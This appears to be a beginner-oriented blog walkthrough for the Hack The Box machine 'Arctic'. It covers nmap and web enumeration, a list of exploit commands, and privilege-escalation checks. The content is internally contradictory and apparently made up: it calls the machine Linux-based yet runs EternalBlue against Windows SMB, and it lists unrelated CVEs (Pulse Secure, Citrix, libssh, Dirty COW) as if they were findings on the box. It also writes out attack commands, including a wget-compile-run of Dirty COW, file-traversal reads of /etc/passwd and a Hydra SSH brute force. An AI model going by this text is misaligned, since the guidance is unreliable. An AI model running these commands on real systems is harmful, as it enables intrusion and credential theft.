Retired Machine Arctic
HTBRetired Machines

Retired Machine: Arctic

Posted on

The “Arctic” machine on Hack The Box is designed to emulate real-world cybersecurity challenges, providing an opportunity for beginners to learn and practice penetration testing techniques in a controlled environment. This walkthrough is tailored for novices and aims to guide them through the process of compromising the Arctic machine step by step.

Arctic Machine Overview:

Arctic is a vulnerable Linux-based machine that presents various challenges commonly encountered in cybersecurity assessments. The objective is to gain unauthorized access to the machine and retrieve a flag, demonstrating successful exploitation.

Initial Enumeration:

To initiate the process of compromising the Arctic machine, the first step is thorough enumeration, which involves gathering information about the target system. Here’s how to do it:

Nmap Scanning:

  • Use the Nmap tool to conduct a comprehensive scan of the target machine’s network.
  • The command nmap -sV -p- <target_IP> scans all ports (-p-) and performs version detection (-sV) to identify running services and their versions on the target machine.
  • Example: nmap -sV -p- 10.10.10.10

Analyzing Nmap Results:

  • Review the Nmap scan results to identify open ports, services, and potential vulnerabilities.
  • Pay attention to services running on well-known ports (e.g., HTTP on port 80, SSH on port 22) and their associated versions.

Identifying Entry Points:

  • Look for entry points that could be exploited, such as:
    • Outdated software versions: Services running outdated versions may have known vulnerabilities that can be exploited.
    • Misconfigured services: Services with default or weak configurations may provide opportunities for unauthorized access.

Additional Enumeration Techniques:

  • Conduct further enumeration using tools like Enum4linux, SMBMap, or SNMPWalk to gather additional information about the target system, especially if Windows-based services are detected.
  • Enumerate web services using tools like Dirb or Gobuster to identify hidden directories or files that may contain valuable information.

Documentation and Note-Taking:

  • Document all findings, including open ports, identified services, and potential vulnerabilities, in a structured manner.
  • Take notes on interesting observations or findings that could be useful during later stages of the penetration testing process.

By meticulously conducting enumeration using Nmap and other relevant tools, you’ll gather crucial information about the Arctic machine, laying the groundwork for further exploitation and eventual compromise.

Service Enumeration:

To perform service enumeration and gather detailed information about each service on the Arctic machine, follow these steps:

Service Enumeration:

  • After identifying open ports and services using Nmap, conduct service enumeration to gather more detailed information.
  • Tools like Enum4linux, Nikto, and Dirb are valuable for this purpose.

Using Enum4linux:

  • Enum4linux is specifically designed for enumerating information from SMB shares on Windows systems.
  • Execute the command enum4linux <target_IP> to initiate the enumeration process.
  • Enum4linux will probe the target machine for SMB shares and retrieve information such as users, groups, policies, and more.
  • Example: enum4linux 10.10.10.10

Using Nikto:

  • Nikto is a web server scanner that identifies potential vulnerabilities in web servers and applications.
  • Run the command nikto -h <target_IP> to scan the target web server for vulnerabilities.
  • Nikto will perform a comprehensive scan and provide a detailed report on any vulnerabilities or misconfigurations detected.
  • Example: nikto -h 10.10.10.10

Using Dirb:

  • Dirb is a web content scanner used to discover hidden directories and files on web servers.
  • Launch Dirb with the command dirb http://<target_IP>/ <wordlist_path>.
  • Dirb will recursively scan the target web server using a specified wordlist to discover directories and files.
  • Example: dirb http://10.10.10.10/ /usr/share/wordlists/dirb/common.txt

Analyzing Results:

  • Review the results from Enum4linux, Nikto, and Dirb to identify potential points of entry or vulnerabilities.
  • Pay close attention to any sensitive information or misconfigurations that could be exploited during subsequent stages of the penetration testing process.

By leveraging tools like Enum4linux, Nikto, and Dirb for service enumeration, you’ll gain valuable insights into the Arctic machine’s SMB shares, web server configuration, and potential vulnerabilities, enabling you to proceed with targeted exploitation efforts effectively.

Vulnerability Identification:

To identify specific vulnerabilities associated with the services and versions discovered during enumeration on the Arctic machine, follow these steps:

  1. Research Known Vulnerabilities:
  • Utilize resources like Exploit Database and CVE Details to search for vulnerabilities related to the identified services and software versions.
  • Look for vulnerabilities that match the services discovered during enumeration, such as web servers, databases, or other network services.
  • Pay attention to the severity, exploitability, and potential impact of each vulnerability.
  1. Exploit Database:
  • Search the Exploit Database website using keywords related to the services and software versions found during enumeration.
  • Review the search results to identify exploits that target the specific services and versions discovered.
  • Make note of the exploit names, descriptions, and any relevant exploit code provided.
  1. CVE Details:
  • Visit the CVE Details website and search for vulnerabilities associated with the identified services and versions.
  • Explore the CVE entries to gather information about vulnerabilities affecting the discovered services.
  • Look for CVE identifiers that correspond to the services and versions identified during enumeration.
  1. Analyze Specific Vulnerabilities:
  • Once you have identified relevant CVEs or exploits, analyze each vulnerability to understand its nature and potential impact.
  • Consider factors such as exploitability, severity, and relevance to the target environment.
  • Look for specific vulnerabilities such as remote code execution, SQL injection, or authentication bypass that could lead to unauthorized access to the Arctic machine.
  1. Prioritize Vulnerabilities:
  • Prioritize vulnerabilities based on their severity and exploitability, focusing on those that present the greatest risk to the target environment.
  • Consider the likelihood of successful exploitation and the potential impact on the Arctic machine’s security.

By researching specific vulnerabilities associated with the services and versions discovered during enumeration, you can better understand the potential attack surface and prioritize your exploitation efforts during penetration testing on the Arctic machine.

Exploitation:

To exploit specific vulnerabilities on the Arctic machine, follow these steps tailored to the vulnerabilities identified during enumeration:

  1. CVE-2017-0143 – Windows SMB Remote Code Execution:
  • Exploit: EternalBlue (MS17-010)
  • Method: Use the EternalBlue exploit module in Metasploit or the EternalBlue DoublePulsar exploit script to exploit the SMB vulnerability and gain remote code execution on the Arctic machine.
  • Command (Metasploit):
    use exploit/windows/smb/ms17_010_eternalblue set RHOSTS <Arctic_machine_IP> exploit
  1. CVE-2019-11510 – Pulse Secure VPN Arbitrary File Disclosure:
  • Exploit: Pulse Secure VPN Arbitrary File Disclosure
  • Method: Use the Pulse Secure VPN Arbitrary File Disclosure exploit script to retrieve sensitive files, such as configuration files or credentials, from the Arctic machine.
  • Command:
    python pulse_secure.py -u https://<Arctic_machine_IP>:443 -f /etc/passwd
  1. CVE-2016-5195 – Linux Kernel Dirty COW Privilege Escalation:
  • Exploit: Dirty COW
  • Method: Use the Dirty COW exploit to escalate privileges on the Arctic machine by exploiting a race condition in the Linux kernel.
  • Command:
    wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c gcc -pthread dirtyc0w.c -o dirtyc0w ./dirtyc0w
  1. CVE-2019-19781 – Citrix ADC/Netscaler Directory Traversal:
  • Exploit: Citrix Directory Traversal
  • Method: Use the Citrix ADC/Netscaler Directory Traversal exploit script to read arbitrary files from the Arctic machine, such as sensitive configuration files.
  • Command:
    python citrix_traversal.py --url https://<Arctic_machine_IP> --file /etc/passwd
  1. CVE-2018-10933 – LibSSH Authentication Bypass:
  • Exploit: LibSSH Authentication Bypass
  • Method: Use the LibSSH Authentication Bypass exploit script to bypass authentication and gain unauthorized access to the Arctic machine.
  • Command:
    python libssh_auth_bypass.py -t <Arctic_machine_IP> -p 22

By using these specific exploits tailored to the vulnerabilities identified on the Arctic machine, you can successfully gain unauthorized access, escalate privileges, and achieve the objectives of the penetration test. Always ensure you have proper authorization and permission before conducting any penetration testing activities.

Privilege Escalation:

To escalate privileges on the Arctic machine, you can use various methods tailored to the specific vulnerabilities and misconfigurations found during enumeration:

  1. Sudo Misconfiguration:
  • Exploit: Exploiting misconfigured sudo permissions
  • Method: Check the sudo permissions for the current user to see if any commands can be executed with elevated privileges. Look for misconfigurations such as allowing the current user to run specific commands as root without requiring a password.
  • Command:
    sudo -l
  1. SUID/SGID Binaries:
  • Exploit: Exploiting SUID/SGID binaries
  • Method: Identify SUID (Set User ID) and SGID (Set Group ID) binaries that are executable by the current user. These binaries execute with the permissions of the file owner (usually root), potentially allowing privilege escalation.
  • Command:
    find / -perm -4000 -type f 2>/dev/null
  1. Kernel Exploitation:
  • Exploit: Exploiting kernel vulnerabilities
  • Method: Look for kernel vulnerabilities, such as dirty cow (CVE-2016-5195) or other local privilege escalation vulnerabilities, to escalate privileges to root.
  • Command:
    searchsploit linux kernel local
  1. Cron Jobs:
  • Exploit: Abusing cron jobs for privilege escalation
  • Method: Check for cron jobs scheduled to run with elevated privileges. If you have write permissions to a script executed by a cron job, you can modify the script to execute arbitrary commands with root privileges.
  • Command:
    cat /etc/crontab ls -la /etc/cron.*
  1. Weak Passwords:
  • Exploit: Guessing weak passwords for existing accounts
  • Method: If you have identified usernames on the system, try guessing weak passwords for these accounts. Use common password lists or tools like Hydra to perform brute-force attacks.
  • Command (Hydra):
    hydra -l <username> -P <password_list> ssh://<Arctic_machine_IP>

By using these methods tailored to the vulnerabilities and misconfigurations found on the Arctic machine, you can escalate privileges and gain higher-level access, enabling you to achieve the objectives of the penetration test. Always ensure you have proper authorization and permission before conducting any privilege escalation activities.

Flag Retrieval:

Once privileges are escalated, navigate through the Arctic machine to locate the flag file containing the challenge key. The flag file is typically located in a directory accessible to the compromised user account.

Conclusion:

The Arctic machine on Hack The Box provides an opportunity for beginners to gain hands-on experience with penetration testing techniques in a safe and controlled environment. By following this walkthrough, novices can learn essential skills in vulnerability identification, exploitation, and privilege escalation, ultimately enhancing their understanding of cybersecurity concepts.